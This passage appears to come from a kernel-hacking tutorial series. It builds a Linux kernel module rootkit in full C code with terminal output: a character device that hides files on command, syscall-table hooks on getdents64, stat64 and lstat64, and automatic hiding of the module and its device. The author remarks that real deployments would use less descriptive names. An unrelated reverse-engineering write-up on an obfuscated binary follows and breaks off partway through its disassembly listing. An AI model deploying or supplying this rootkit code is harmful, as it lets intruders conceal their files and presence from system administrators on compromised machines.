root@dev:~/lkms/hidefiles# insmod ./hidefiles.ko
root@dev:~/lkms/hidefiles# ls
functs.c  functs.o      hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
functs.h  hidefiles.ko  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
root@dev:~/lkms/hidefiles# rmmod hidefiles
root@dev:~/lkms/hidefiles# ls
functs.c  functs.o      hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h  thisisatestfile.txt
functs.h  hidefiles.ko  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o

So, as you can clearly see, our LKM automatically hides files on initialization and now should have the capability to hide multiple files.

Character Device

We now need the ability to communicate with the LKM to dynamically hide and unhide files. The only way we've learned how to do this so far is by using a character device.

This character device will be simpler than our previous one because we only need the write operation but you can implement read for feedback if you want.

We will put this in a new file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#include "cdev.h"

#define DEV_MAX 512

static struct file_operations dev_fops = {
    .write = dev_write,
};

struct miscdevice dev_misc_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "hidefiles",
    .fops = &dev_fops
};

ssize_t dev_write(struct file *filep,const char *buff,size_t count,loff_t *offp )
{
    char temp_dev_file[DEV_MAX+1], new_dev_file[DEV_MAX];
    int i, n;
    memset(new_dev_file, 0, DEV_MAX);
    memset(temp_dev_file, 0, DEV_MAX+1);
    if(count > DEV_MAX){
        if(copy_from_user(temp_dev_file,buff,DEV_MAX) != 0)
            printk("Userspace -> kernel copy failed!\n");
        else {
            temp_dev_file[DEV_MAX] = '\0';
            for (i = 2, n = 0; i < strlen(temp_dev_file); i++, n++) {
                new_dev_file[n] = temp_dev_file[i];
            }
            if (strncmp(temp_dev_file, "a", 1) == 0 || strncmp(temp_dev_file, "A", 1) == 0) {
                addfile(new_dev_file);
            } else if (strncmp(temp_dev_file, "r", 1) == 0 || strncmp(temp_dev_file, "R", 1) == 0) {
                remfile(new_dev_file);
            }
        }
        return DEV_MAX;
    } else {
        if(copy_from_user(temp_dev_file,buff,count) != 0)
            printk("Userspace -> kernel copy failed!\n");
        else {
            for (i = 2, n = 0; i < strlen(temp_dev_file); i++, n++) {
                new_dev_file[n] = temp_dev_file[i];
            }
            if (strncmp(temp_dev_file, "a", 1) == 0 || strncmp(temp_dev_file, "A", 1) == 0) {
                addfile(new_dev_file);
            } else if (strncmp(temp_dev_file, "r", 1) == 0 || strncmp(temp_dev_file, "R", 1) == 0) {
                remfile(new_dev_file);
            }
        }
        return count;
    }
}

Here I'm setting the maximum size to 512 but you can set it to what you wish.

I also return the number of bytes written here so that it doesn't break some applications that try to write to it (python for example).

The first character of the input is being used as the operation (A or a for adding a file and R or r for removing a file) and the actual filename starts after the second character in the input.

I've also fixed the buffer overflow that was in the last character device.

We need to create the following header file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#ifndef CDEV
#define CDEV

#include <linux/fs.h>
#include <asm/uaccess.h>
#include <linux/miscdevice.h>

#include "list.h"

// Functions
ssize_t dev_write(struct file *filep,const char *buff,size_t count,loff_t *offp );


// Structs
extern struct miscdevice dev_misc_device;

#endif

Now we need to include cdev.h in main.c, by adding the line #include "cdev.h" at the top, initialize the device on load and remove the device on unload, so our main.c should end up like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

#include "syscalls.h"
#include "functs.h"
#include "list.h"
#include "cdev.h"

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{
    sys_call_table = find_sys_call_table();
    if(sys_call_table == NULL)
        return 1;
    original_getdents64 = sys_call_table[__NR_getdents64];

    disable_write_protection();
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
    enable_write_protection();
    misc_register(&dev_misc_device);
    addfile("thisisatestfile.txt");
    return 0;
}

static void __exit hidefiles_exit(void)
{
    disable_write_protection();
    sys_call_table[__NR_getdents64] = original_getdents64;
    enable_write_protection();
    misc_deregister(&dev_misc_device);
    emptylist();
    return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);

Lastly we need to add cdev.o to the makefile:

1
2
3
obj-m += hidefiles.o

hidefiles-y := main.o syscalls.o functs.o list.o cdev.o

Now we just need to test it:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
root@dev:~/lkms/hidefiles# make -C /lib/modules/$(uname -r)/build M=$PWD modules
make: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae'
  CC [M]  /root/lkms/hidefiles/cdev.o
/root/lkms/hidefiles/cdev.c: In function ‘dev_write’:
/root/lkms/hidefiles/cdev.c:50:1: warning: the frame size of 1028 bytes is larger than 1024 bytes [-Wframe-larger-than=]
  LD [M]  /root/lkms/hidefiles/hidefiles.o
  Building modules, stage 2.
  MODPOST 1 modules
  LD [M]  /root/lkms/hidefiles/hidefiles.ko
make: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae'
root@dev:~/lkms/hidefiles# ls
app     cdev.h    functs.h      hidefiles.mod.c  list.c  main.c    modules.order   syscalls.h
app.c   cdev.o    functs.o      hidefiles.mod.o  list.h  main.o    Module.symvers  syscalls.o
cdev.c  functs.c  hidefiles.ko  hidefiles.o      list.o  Makefile  syscalls.c      thisisatestfile.txt
root@dev:~/lkms/hidefiles# insmod ./hidefiles.ko
root@dev:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.ko     hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
app.c  cdev.h  functs.c  functs.o  hidefiles.mod.c  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:hidefiles.ko")'
root@dev:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
app.c  cdev.h  functs.c  functs.o  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:app")'
root@dev:~/lkms/hidefiles# ls
app.c   cdev.h  functs.c  functs.o         hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
cdev.c  cdev.o  functs.h  hidefiles.mod.c  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:app.c")'
root@dev:~/lkms/hidefiles# ls
cdev.c  cdev.o    functs.h  hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
cdev.h  functs.c  functs.o  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("r:app.c")'
root@dev:~/lkms/hidefiles# ls
app.c   cdev.h  functs.c  functs.o         hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
cdev.c  cdev.o  functs.h  hidefiles.mod.c  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("r:app")'
root@dev:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
app.c  cdev.h  functs.c  functs.o  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:hidefiles.mod.c")'
root@dev:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
app.c  cdev.h  functs.c  functs.o  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:hidefiles.mod.o")'
root@dev:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
app.c  cdev.h  functs.c  functs.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
root@dev:~/lkms/hidefiles# rmmod hidefiles
root@dev:~/lkms/hidefiles# ls
app     cdev.h    functs.h      hidefiles.mod.c  list.c  main.c    modules.order   syscalls.h
app.c   cdev.o    functs.o      hidefiles.mod.o  list.h  main.o    Module.symvers  syscalls.o
cdev.c  functs.c  hidefiles.ko  hidefiles.o      list.o  Makefile  syscalls.c      thisisatestfile.txt

As you can see, we are now able to hide and unhide files on demand, there is, however, still a problem:

1
2
3
4
5
6
root@dev:~/lkms/hidefiles# insmod ./hidefiles.ko
root@dev:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.ko     hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
app.c  cdev.h  functs.c  functs.o  hidefiles.mod.c  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
root@dev:~/lkms/hidefiles# ls thisisatestfile.txt
thisisatestfile.txt

Hiding Files Better

Now let's hide the files even when they are queried directly.

To figure out how to do this we will use the same method as we did when figuring out how to hide files to being with, by looking at the system calls that are being made and hooking them.

We will start by determining the system calls responsible for this:

1
2
3
4
5
root@dev:~/lkms/hidefiles# strace ls thisisatestfile.txt 2>&1 | grep 'thisisatestfile.txt'
execve("/bin/ls", ["ls", "thisisatestfile.txt"], [/* 18 vars */]) = 0
stat64("thisisatestfile.txt", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
lstat64("thisisatestfile.txt", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
write(1, "thisisatestfile.txt\n", 20thisisatestfile.txt

I've grepped for the filename because the system call must be querying the filename directly, we've found 2 (stat64 and lstat64).

It looks like it returns 0 when its successful, let's see what happens when its unsuccessful:

1
2
3
4
5
root@dev:~/lkms/hidefiles# strace ls thisisnotafile.txt 2>&1 | grep 'thisisnotafile.txt'
execve("/bin/ls", ["ls", "thisisnotafile.txt"], [/* 18 vars */]) = 0
stat64("thisisnotafile.txt", 0x8cdf3b8) = -1 ENOENT (No such file or directory)
lstat64("thisisnotafile.txt", 0x8cdf3b8) = -1 ENOENT (No such file or directory)
write(2, "cannot access thisisnotafile.txt", 32cannot access thisisnotafile.txt) = 32

So they return -ENOENT if the file does not exist.

Another thing to note about this output is that the second argument to both stat64 and lstat64 is a pointer to a buffer which on a success is populated by the system call and obviously left blank in a failure.

The manpage for these functions confirms that:

1
2
int stat(const char *path, struct stat *buf);
int lstat(const char *path, struct stat *buf);

We don't care too much about the stat struct because if it matches any of our hidden files we will just return -ENOENT and otherwise we will forward the request to the original system call.

If we wanted to actually manipulate the results that applications got back from these systems calls, we could use this structure to do so.

One more thing to check is what the request looks like when a full path is given:

1
2
3
4
root@dev:~/lkms/hidefiles# strace ls ~/lkms/hidefiles/thisisatestfile.txt 2>&1 | grep 'thisisatestfile.txt'
stat64("/root/lkms/hidefiles/thisisatestfile.txt", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
lstat64("/root/lkms/hidefiles/thisisatestfile.txt", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
write(1, "/root/lkms/hidefiles/thisisatest"..., 41/root/lkms/hidefiles/thisisatestfile.txt

So the full path is passed to the system call, we will have to deal with this because obviously we only have a list of filenames so we will have to manually extract the actual filename to check against our list.

First let's write the function which extracts the filename from the full path and checks if it is in the list:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int extractfilename(const char *f)
{
    int i, n, c;
    size_t l;
    l = strlen(f);

    for(i = l-1, n = 0; i>=0; i--, n++){
        if(f[i] == '/'){
            i = -1;
            break;
        }
    }

    if(i == -1)
        c = n+1;
    else
        c = l;

    char s[c];
    memset(s, 0, c);

    for(i = 0; n>0; i++, n--)
        s[i] = f[l-n];

    return lookupfilename(s);
}

We need to add the prototype in list.h so that the other files can use it:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
#ifndef LIST
#define LIST

#include <linux/vmalloc.h>

// Functions
void addfile(const char *f);
void remfile(const char *f);
void emptylist(void);
int lookupfilename(const char *f);
int extractfilename(const char *f);

#endif

Now for the system calls, this should be added to syscalls.c:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
asmlinkage int (*original_stat64) (const char *path, struct stat64 *buf);
asmlinkage int (*original_lstat64) (const char *path, struct stat64 *buf);

asmlinkage int stat64_hook(const char *path, struct stat64 *buf)
{
    if ((extractfilename(path)) == 1)
        return -ENOENT;
    return original_stat64(path, buf);
}

asmlinkage int lstat64_hook(const char *path, struct stat64 *buf)
{
    if ((extractfilename(path)) == 1)
        return -ENOENT;
    return original_lstat64(path, buf);
}

And we need to update syscalls.h:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#ifndef SYSCALLS
#define SYSCALLS

#include <linux/semaphore.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <linux/stat.h>

// Functions
asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
extern asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
asmlinkage int stat64_hook(const char *path, struct stat64 *buf);
asmlinkage int lstat64_hook(const char *path, struct stat64 *buf);
extern asmlinkage int (*original_stat64) (const char *path, struct stat64 *buf);
extern asmlinkage int (*original_lstat64) (const char *path, struct stat64 *buf);

#endif

We need to include linux/stat.h because that includes the declaration of the stat64 structure.

And lastly we need to update main.c to hook and unhook these 2 syscalls on load/unload:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

#include "syscalls.h"
#include "functs.h"
#include "list.h"
#include "cdev.h"

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{
    sys_call_table = find_sys_call_table();
    if(sys_call_table == NULL)
        return 1;
    original_getdents64 = sys_call_table[__NR_getdents64];
    original_stat64 = sys_call_table[__NR_stat64];
    original_lstat64 = sys_call_table[__NR_lstat64];

    disable_write_protection();
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
    sys_call_table[__NR_stat64] = stat64_hook;
    sys_call_table[__NR_lstat64] = lstat64_hook;
    enable_write_protection();
    misc_register(&dev_misc_device);
    addfile("hidefiles");
    addfile("hidefiles.ko");
    return 0;
}

static void __exit hidefiles_exit(void)
{
    disable_write_protection();
    sys_call_table[__NR_getdents64] = original_getdents64;
    sys_call_table[__NR_stat64] = original_stat64;
    sys_call_table[__NR_lstat64] = original_lstat64;
    enable_write_protection();
    misc_deregister(&dev_misc_device);
    emptylist();
    return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);

I've changed the files that it automatically hides when loaded to hidefiles (which is the name of the character device file) and hidefiles.ko (which is the name of the LKM) because this is more useful, in reality these would be named something less descriptive and the other source files wouldn't be there.

Finally to test it:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
root@dev:~/lkms/hidefiles# make -C /lib/modules/$(uname -r)/build M=$PWD modules
make: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae'
  CC [M]  /root/lkms/hidefiles/main.o
/root/lkms/hidefiles/main.c: In function ‘hidefiles_init’:
/root/lkms/hidefiles/main.c:19:17: warning: assignment from incompatible pointer type [enabled by default]
  CC [M]  /root/lkms/hidefiles/syscalls.o
  CC [M]  /root/lkms/hidefiles/list.o
/root/lkms/hidefiles/list.c: In function ‘extractfilename’:
/root/lkms/hidefiles/list.c:110:2: warning: ISO C90 forbids mixed declarations and code [-Wdeclaration-after-statement]
  CC [M]  /root/lkms/hidefiles/cdev.o
/root/lkms/hidefiles/cdev.c: In function ‘dev_write’:
/root/lkms/hidefiles/cdev.c:51:1: warning: the frame size of 1032 bytes is larger than 1024 bytes [-Wframe-larger-than=]
  LD [M]  /root/lkms/hidefiles/hidefiles.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/lkms/hidefiles/hidefiles.mod.o
  LD [M]  /root/lkms/hidefiles/hidefiles.ko
make: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae'
root@dev:~/lkms/hidefiles# ls -l
total 852
-rwxr-xr-x 1 root root   5765 Nov  5 13:49 app
-rw-r--r-- 1 root root    594 Nov  5 13:09 app.c
-rw-r--r-- 1 root root   1462 Nov  5 20:10 cdev.c
-rw-r--r-- 1 root root    281 Nov  5 12:32 cdev.h
-rw-r--r-- 1 root root  58968 Nov  5 20:34 cdev.o
-rw-r--r-- 1 root root   1359 Oct 31 16:08 functs.c
-rw-r--r-- 1 root root    154 Oct 31 16:10 functs.h
-rw-r--r-- 1 root root  69332 Oct 31 16:12 functs.o
-rw-r--r-- 1 root root 278101 Nov  5 20:41 hidefiles.ko
-rw-r--r-- 1 root root   1203 Nov  5 20:34 hidefiles.mod.c
-rw-r--r-- 1 root root  43172 Nov  5 20:34 hidefiles.mod.o
-rw-r--r-- 1 root root 235955 Nov  5 20:41 hidefiles.o
-rw-r--r-- 1 root root   2015 Nov  5 20:12 list.c
-rw-r--r-- 1 root root    227 Nov  5 20:34 list.h
-rw-r--r-- 1 root root  21336 Nov  5 20:34 list.o
-rw-r--r-- 1 root root   1261 Nov  5 20:41 main.c
-rw-r--r-- 1 root root  72572 Nov  5 20:41 main.o
-rw-r--r-- 1 root root     78 Nov  5 11:34 Makefile
-rw-r--r-- 1 root root     41 Nov  5 20:41 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root   1163 Nov  5 20:32 syscalls.c
-rw-r--r-- 1 root root    672 Nov  5 20:30 syscalls.h
-rw-r--r-- 1 root root  19560 Nov  5 20:34 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt
root@dev:~/lkms/hidefiles# insmod ./hidefiles.ko
root@dev:~/lkms/hidefiles# ls -l
total 580
-rwxr-xr-x 1 root root   5765 Nov  5 13:49 app
-rw-r--r-- 1 root root    594 Nov  5 13:09 app.c
-rw-r--r-- 1 root root   1462 Nov  5 20:10 cdev.c
-rw-r--r-- 1 root root    281 Nov  5 12:32 cdev.h
-rw-r--r-- 1 root root  58968 Nov  5 20:34 cdev.o
-rw-r--r-- 1 root root   1359 Oct 31 16:08 functs.c
-rw-r--r-- 1 root root    154 Oct 31 16:10 functs.h
-rw-r--r-- 1 root root  69332 Oct 31 16:12 functs.o
-rw-r--r-- 1 root root   1203 Nov  5 20:34 hidefiles.mod.c
-rw-r--r-- 1 root root  43172 Nov  5 20:34 hidefiles.mod.o
-rw-r--r-- 1 root root 235955 Nov  5 20:41 hidefiles.o
-rw-r--r-- 1 root root   2015 Nov  5 20:12 list.c
-rw-r--r-- 1 root root    227 Nov  5 20:34 list.h
-rw-r--r-- 1 root root  21336 Nov  5 20:34 list.o
-rw-r--r-- 1 root root   1261 Nov  5 20:41 main.c
-rw-r--r-- 1 root root  72572 Nov  5 20:41 main.o
-rw-r--r-- 1 root root     78 Nov  5 11:34 Makefile
-rw-r--r-- 1 root root     41 Nov  5 20:41 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root   1163 Nov  5 20:32 syscalls.c
-rw-r--r-- 1 root root    672 Nov  5 20:30 syscalls.h
-rw-r--r-- 1 root root  19560 Nov  5 20:34 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt
root@dev:~/lkms/hidefiles# ls -l /dev/hidefiles
ls: cannot access /dev/hidefiles: No such file or directory
root@dev:~/lkms/hidefiles# ls -l hidefiles.ko
ls: cannot access hidefiles.ko: No such file or directory
root@dev:~/lkms/hidefiles# ls -l ~/lkms/hidefiles/hidefiles.ko
ls: cannot access /root/lkms/hidefiles/hidefiles.ko: No such file or directory
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:list.c")'
root@dev:~/lkms/hidefiles# ls -l list.c
ls: cannot access list.c: No such file or directory
root@dev:~/lkms/hidefiles# ls
app     functs.c         hidefiles.o  Makefile        syscalls.o
app.c   functs.h         list.h       modules.order   thisisatestfile.txt
cdev.c  functs.o         list.o       Module.symvers
cdev.h  hidefiles.mod.c  main.c       syscalls.c
cdev.o  hidefiles.mod.o  main.o       syscalls.h
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:list.h")'
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:list.o")'
root@dev:~/lkms/hidefiles# ls
app     cdev.o    hidefiles.mod.c  main.o          syscalls.c
app.c   functs.c  hidefiles.mod.o  Makefile        syscalls.h
cdev.c  functs.h  hidefiles.o      modules.order   syscalls.o
cdev.h  functs.o  main.c           Module.symvers  thisisatestfile.txt
root@dev:~/lkms/hidefiles# for f in `ls`; do python -c "open('/dev/hidefiles', 'w').write(\"a:$f\")"; done
root@dev:~/lkms/hidefiles# ls
root@dev:~/lkms/hidefiles# ls -l
total 0
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("r:list.o")'
root@dev:~/lkms/hidefiles# ls
list.o
root@dev:~/lkms/hidefiles# rmmod hidefiles
root@dev:~/lkms/hidefiles# ls
app     cdev.o    hidefiles.ko     list.c  main.o          syscalls.c
app.c   functs.c  hidefiles.mod.c  list.h  Makefile        syscalls.h
cdev.c  functs.h  hidefiles.mod.o  list.o  modules.order   syscalls.o
cdev.h  functs.o  hidefiles.o      main.c  Module.symvers  thisisatestfile.txt

Funnily enough this also hides directories with a name that is in the list but doesn't stop you from cd'ing there:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
root@dev:~/lkms/hidefiles# insmod ./hidefiles.ko
root@dev:~/lkms/hidefiles# cd ..
root@dev:~/lkms# ls -l
total 720
-rw-r--r-- 1 root root    380 May 12 19:47 hello.c
-rw-r--r-- 1 root root  74389 Jul 11 17:54 hello.ko
-rw-r--r-- 1 root root    659 Jul 11 17:54 hello.mod.c
-rw-r--r-- 1 root root  42436 Jul 11 17:54 hello.mod.o
-rw-r--r-- 1 root root  32960 Jul 11 17:53 hello.o
-rw-r--r-- 1 root root   2080 Jul 11 18:18 hidefile.c
-rw-r--r-- 1 root root 122949 Jul 11 18:18 hidefile.ko
-rw-r--r-- 1 root root    810 Jul 11 17:54 hidefile.mod.c
-rw-r--r-- 1 root root  42636 Jul 11 17:54 hidefile.mod.o
-rw-r--r-- 1 root root  81320 Jul 11 18:18 hidefile.o
-rw-r--r-- 1 root root    195 Jul 11 17:51 Makefile
-rw-r--r-- 1 root root     86 Jul 11 18:18 modules.order
-rw-r--r-- 1 root root      0 May 12 19:35 Module.symvers
-rwxr-xr-x 1 root root   6107 Jun  4 21:04 reverse_app
-rwxr-xr-x 1 root root   6135 Jun  9 23:21 reverse-app
-rwxr-xr-x 1 root root   6140 Jun  9 23:41 reverse-app2
-rw-r--r-- 1 root root    899 Jun  9 23:41 reverse-app2.c
-rw-r--r-- 1 root root    899 Jun  9 23:14 reverse-app.c
-rw-r--r-- 1 root root   2013 Jun  9 22:49 reverse.c
-rw-r--r-- 1 root root 119395 Jul 11 17:54 reverse.ko
-rw-r--r-- 1 root root   1019 Jul 11 17:54 reverse.mod.c
-rw-r--r-- 1 root root  42888 Jul 11 17:54 reverse.mod.o
-rw-r--r-- 1 root root  77532 Jul 11 17:53 reverse.o
-rwxr-xr-x 1 root root   6587 Jun  9 22:25 reverse-test-app
-rw-r--r-- 1 root root    987 Jun  9 22:16 reverse-test-app.c
-rw-r--r-- 1 root root      0 Jul 11 18:18 thisisatestfile.txt
root@dev:~/lkms# ls -l hidefiles
ls: cannot access hidefiles: No such file or directory
root@dev:~/lkms# ls -l hidefiles/
total 580
-rwxr-xr-x 1 root root   5765 Nov  5 13:49 app
-rw-r--r-- 1 root root    594 Nov  5 13:09 app.c
-rw-r--r-- 1 root root   1462 Nov  5 20:10 cdev.c
-rw-r--r-- 1 root root    281 Nov  5 12:32 cdev.h
-rw-r--r-- 1 root root  58968 Nov  5 20:34 cdev.o
-rw-r--r-- 1 root root   1359 Oct 31 16:08 functs.c
-rw-r--r-- 1 root root    154 Oct 31 16:10 functs.h
-rw-r--r-- 1 root root  69332 Oct 31 16:12 functs.o
-rw-r--r-- 1 root root   1203 Nov  5 20:34 hidefiles.mod.c
-rw-r--r-- 1 root root  43172 Nov  5 20:34 hidefiles.mod.o
-rw-r--r-- 1 root root 235955 Nov  5 20:41 hidefiles.o
-rw-r--r-- 1 root root   2015 Nov  5 20:12 list.c
-rw-r--r-- 1 root root    227 Nov  5 20:34 list.h
-rw-r--r-- 1 root root  21336 Nov  5 20:34 list.o
-rw-r--r-- 1 root root   1261 Nov  5 20:41 main.c
-rw-r--r-- 1 root root  72572 Nov  5 20:41 main.o
-rw-r--r-- 1 root root     78 Nov  5 11:34 Makefile
-rw-r--r-- 1 root root     41 Nov  5 20:41 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root   1163 Nov  5 20:32 syscalls.c
-rw-r--r-- 1 root root    672 Nov  5 20:30 syscalls.h
-rw-r--r-- 1 root root  19560 Nov  5 20:34 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt
root@dev:~/lkms# cd hidefiles
root@dev:~/lkms/hidefiles#

Anyway, our improved rootkit seems to work nicely and as expected.

It is still currently easy to detect our rootkit though:

1
2
root@dev:~/lkms/hidefiles# lsmod | grep hide
hidefiles              12763  0

You can get the full finished source code for the rootkit here.

Conclusion

We have used a number of techniques here to figure out how to hide files on the system and we have combined all of the knowledge we have gained to far to achieve this.

However, there are still a lot of ways we can improve this LKM, hiding the LKM's existence, and using the network to communicate are just a couple (we will take these up later).

When dealing with kernel code you have to be very careful as you can break the whole system, this is evident with the first character device that we created (just load the device and write 5000 bytes to it, the system will crash instantly).

Happy Kernel Hacking :-)

Further Reading

This article on Kernel Rootkit Tricks by Jürgen Quade

The Phrack article titled Linux on-the-fly kernel patching without LKM by sd and devik

Designing BSD Rootkits by Joseph Kong

And of course the kernel documentation

Reversing A Simple Obfuscated Application

I created this application as a little challenge and some practice at manually obfuscating an application at the assembly level.

I wrote the application in IA32 assembly and then manually obfuscated it using a couple of different methods.

Here I will show how to solve the challenge in 2 different ways.

Lastly I will show how the obfuscation could have been done better so that it would have been a lot more difficult to solve this using a simple static disassembly.

The Challenge

We are given the static disassembly below of a 32bit linux application which says whether or not the author is going to some event:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
./going-or-not-obf:     file format elf32-i386


Disassembly of section .text:

08048060 <.text>:
 8048060:   89 c2                   mov    edx,eax
 8048062:   bf 25 00 00 00          mov    edi,0x25
 8048067:   eb 4d                   jmp    0x80480b6
 8048069:   b3 32                   mov    bl,0x32
 804806b:   5e                      pop    esi
 804806c:   31 c0                   xor    eax,eax
 804806e:   74 6c                   je     0x80480dc
 8048070:   b7 6a                   mov    bh,0x6a
 8048072:   e8 17 00 00 00          call   0x804808e
 8048077:   b1 04                   mov    cl,0x4
 8048079:   8a 06                   mov    al,BYTE PTR [esi]
 804807b:   29 cc                   sub    esp,ecx
 804807d:   41                      inc    ecx
 804807e:   30 c8                   xor    al,cl
 8048080:   31 c9                   xor    ecx,ecx
 8048082:   83 f8 04                cmp    eax,0x4
 8048085:   74 12                   je     0x8048099
 8048087:   8d 4d f1                lea    ecx,[ebp-0xf]
 804808a:   b2 10                   mov    dl,0x10
